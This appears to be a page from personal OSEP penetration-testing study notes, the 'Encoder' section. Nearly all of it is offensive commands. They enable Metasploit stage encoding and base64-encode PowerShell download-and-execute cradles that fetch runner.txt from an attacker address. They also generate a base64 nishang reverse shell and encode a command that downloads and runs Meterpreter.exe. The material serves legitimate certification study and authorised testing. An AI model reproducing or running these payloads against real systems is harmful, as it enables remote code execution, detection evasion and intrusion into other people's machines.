OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  • Msf Payload Encoding
  • Encode PowerShell payload
  • To generate TCP nishang reverse shell into base64
  • Powershell - Base64 encoder
  1. OSEP
  2. Metasploit Payload & Listener

Encoder

PreviousMetasploit Useful ModulesNextFile Transfer & Execution

Last updated 1 year ago

Msf Payload Encoding

set enablestageencoding true
set stageencoder x64/zutto_dekiru

Encode PowerShell payload

  • Windows

[system.convert]::tobase64string([system.text.encoding]::unicode.getbytes('IEX ((new-object net.webclient).downloadstring("http://192.168.x.y/runner.txt"))'))

  • Linux

echo -en 'IEX ((new-object net.webclient).downloadstring("http://192.168.x.y/runner.txt"))' | iconv -t UTF-16LE | base64 -w 0

To generate TCP nishang reverse shell into base64 

python3 revshell-base64.py 1.1.1.1 443

Powershell - Base64 encoder

$command = "Invoke-WebRequest -Uri http://192.168.1.1/Meterpreter.exe -Outfile C:\Users\Public\Meterpreter.exe; C:\Users\Public\Meterpreter.exe"
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
Write-Host $encoded
Link to the script